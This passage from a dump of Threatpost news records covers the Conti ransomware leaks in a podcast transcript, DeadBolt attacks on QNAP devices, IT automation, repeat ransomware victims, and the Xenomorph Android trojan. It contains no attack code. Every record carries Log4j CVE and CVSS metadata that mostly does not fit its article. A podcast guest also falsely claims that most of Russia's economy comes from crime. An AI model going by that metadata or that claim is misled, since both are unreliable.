going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T17:04:20", "description": "DeadBolt ransomware has resurfaced in a new wave of attacks on QNAP that begin in mid-March and signals a new targeting of the Taiwan-based network-attached storage (NAS) devices by the fledgling threat, researchers said.\n\nResearchers from Censys, which provides attack-surface management solutions, said they observed DeadBolt infections on QNAP gear ramp up slowly starting March 16, with a total of 373 infections that day. That number that rose to 1,146 devices by March 19, according to [a blog post](<https://censys.io/deadbolt-ransomware-is-back/>) by Censys senior security researcher Mark Ellzey.\n\nThe current attacks harken [back to January](<https://threatpost.com/conti-deadbolt-delta-qnap-ransomware/178083/>), when the company had to push out an unplanned update to its NAS devices, one that not all customers welcomed. The update was meant to clean up after DeadBolt attacks that were greeting customers with the ransomware group\u2019s screen when they logged in, effectively locking them out of the device.\n\nThe new wave of attacks ostensibly follow the same pattern as January\u2019s wave, but the majority of the victims are running the QNAP QTS Linux kernel version 5.10.60, Ellzey said. That\u2019s a later version than the update ([QTS 5.0.0.1891)](<https://www.qnap.com/en-us/release-notes/qts/5.0.0.1891/20211221>) pushed out to customers in January.\n\nThat said, \u201cat this time, Censys cannot state whether this is a new attack targeting different versions of the QTS operating system, or if it\u2019s the original exploit targeting unpatched QNAP devices,\u201d he acknowledged.\n\nMoreover, the new infections do not seem to be targeting a specific organization or country; they seem to be evenly split between subscribers of various consumer internet service providers, Ellzey added.\n\n## **D\u00e9j\u00e0 Vu for QNAP Customers**\n\nThe attacks behave the same as the January attacks as far as what the customers experience \u2014 and they ask for the same ransom as previous DeadBolt attacks on QNAP devices, Ellzey said.\n\n\u201cExcept for the [Bitcoin] addresses used to send ransoms to, the attack remains the same: backup files are encrypted, the web administration interface is modified, and victims are greeted with [ransom] messages,\u201d he wrote in the post.\n\nThe attackers are asking for 0.03 Bitcoin for a decryption key, which is about $1,223 at today\u2019s exchange rate. They\u2019re also asking for a ransom from QNAP itself: 5 bitcoin or $203,988, for information related to the vulnerabilities; and 50 bitcoin, or about $2 million, for a master key to unlock all affected victims, Ellzey said.\n\nQNAP is not the only company in the crosshairs of DeadBolt, which first came to researchers\u2019 attention due to the January attacks. In mid-February, Reddit users began reporting that the ransomware was targeting [ASUSTOR ADM devices](<https://www.asustor.com/service/release_notes#adm4>), according to Censys.\n\n## **Attack Detection**\n\nCensys researchers picked up on the latest wave of QNAP attacks due to the unique way the current DeadBolt ransomware variant communicates with victims, according to the post.\n\n\u201cInstead of encrypting the entire device, which effectively takes the device offline (and out of the purview of Censys), the ransomware only targets specific backup directories for encryption, and vandalizes the web-administration interface with an informational message explaining how to remove the infection,\u201d Ellzey wrote.\n\nTherefore, using [a simple search query](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=INCLUDE&q=services.http.response.html_title%3A+%22ALL+YOUR+FILES+HAVE+BEEN+LOCKED+BY+DEADBOLT.%22>), Censys \u201ccould easily find infected devices exposed on the public internet,\u201d according to the post.\n\nAlong with general information about what hosts were infected with DeadBolt, researchers also obtained and tracked every unique Bitcoin wallet address used as a ransom drop, Ellzey added.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:43:49", "type": "threatpost", "title": "DeadBolt Ransomware Resurfaces to Hit QNAP Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:43:49", "id": "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "href": "https://threatpost.com/deadbolt-ransomware-qnap-again/179057/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T16:05:10", "description": "The majority of today\u2019s cybersecurity breaches stem from unpatched vulnerabilities and outdated systems, which means that many cyberattacks are preventable. Unfortunately, it can be challenging for IT teams to keep up with the pace of new patches every month, especially when employee devices are scattered across a distributed workforce and there\u2019s a shortage of cybersecurity professionals. These emerging factors make efficiency a critical component for any IT team.\n\n\n\nTo enable a rapid discovery of new exploits, more companies are turning to IT-automation tools for patching and system management. By streamlining the processes and reducing the workload, IT teams can quickly address new severe exploits and save time to focus their efforts on more high-impact projects.\n\nHowever, while the trend of automation will continue to grow, there still remain many challenges to its adoption, and new innovations or threats could change how the future looks for this technology.\n\n## What Can We Expect in IT Automation in the Near Future?\n\nFirst and foremost, IT automation will adapt to distributed environments. When we surveyed IT professionals, 80 percent stated that the process of managing endpoints has become harder as a result of more employees working remotely. Having to both maintain management servers across multiple, distributed sites and with sporadic, inconsistent connectivity to endpoints has made it difficult for IT teams to remain efficient and nimble. This has led to more organizations looking for cloud-native solutions to remedy these challenges.\n\nCloud-native technologies make connectivity with remote devices easier while staying secure without the use of VPNs. They also improve visibility into the exact, real-time status of a device. IT teams will have an easier time pushing patches automatically without worrying about VPN bandwidth restrictions. Within the next year, anticipate that more businesses will realize these immense benefits and replace existing tools with cloud-native IT automation.\n\nOn the flip side, challenges remain, such as addressing burnout and emerging security concepts.\n\n## IT and Security Teams\u2019 Mental Health Comes to the Fore\n\nOne thing that has become evident in the 2020s is that there is a lack of attention on and investment in employee mental health and safety. This is especially true when it comes to IT and security workers, who have come under enormous pressure and stress in our hybrid world today, where both outages and cyberattacks aren\u2019t just common, but expected to happen at all times.\n\nAutomation is one way to drive more accessibility and ease-of-use for IT teams. While in the past the core argument for automation is to provide more time for innovation, today the argument must simply be, automation creates more time for teams \u2014 but we\u2019re not there yet.\n\nConsider the (relatively) recent issue with the [Log4j vulnerability](<https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/>). The issue wasn\u2019t \u201cjust\u201d that there was a new vulnerability to respond to and worry about. It was that many security and IT professionals had to go through the manual task of updating every endpoint across their system, while managers and even the C-suite watched over their shoulders.\n\nThis isn\u2019t easy \u2013 it\u2019s stressful, and it will make your teams more likely to quit, which is just unacceptable as we continue to navigate a world reshaped by the Great Resignation and IT skills shortage.\n\n## New IT Security Concepts Are on the Horizon\n\nAs Automox predicted at the end of last year, IT and security transformation continue as organizations everywhere try to find a new normal following the disruptions of the pandemic, and IT automation will have to adjust.\n\nThis has been challenging for many organizations \u2014 and more importantly, people, as discussed above \u2014 but there are silver linings too. The pandemic has pushed new innovation across many areas, with exciting new tools and practices on the horizon for IT and security teams.\n\nOne innovation that is particularly interesting is cybersecurity mesh architectures. Gartner has claimed that \u201corganizations adopting a cybersecurity mesh architecture will reduce the financial impact of security incidents by an average of 90 percent\u201d by 2024.\n\nA cybersecurity mesh architecture leverages various parts of the enterprise to integrate widely distributed, disparate security services. This is key to managing and accounting for a workforce that has never been more remote and globally distributed. Designing and implementing an IT security infrastructure that is not focused on a single perimeter, but instead smaller individual perimeters around each access point, provides quality-of-life improvements as well as more control over an organization\u2019s overall security profile.\n\nAnother trend that may seem overdue but is very much happening in real-time is the transition of ITOps and SecOps tools to cloud infrastructure. This includes firewalls, cloud access service brokers (CASBs), web gateways and other tools, as teams wind down legacy on-prem contracts and move to the cloud for more accessibility, speed and scale.\n\nBottom line: IT automation is a transformational trend that is already occurring across the enterprise today, but it needs to accelerate in order to address the many pain points security and IT teams still face today.\n\n**_Chris Hass is the Director of Information Security and Research at [Automox](<https://www.automox.com/>)._**\n\n**_Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/\\]>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-08T15:56:36", "type": "threatpost", "title": "The Uncertain Future of IT Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-08T15:56:36", "id": "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "href": "https://threatpost.com/uncertain-future-it-automation/178709/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. The goal of course is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE!\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph as still under development. However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification-interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from the victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality **\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibilty events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22123754/Alien-xenomorph-scaled-e1645551511463.jpeg>)\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. Based on what targeted 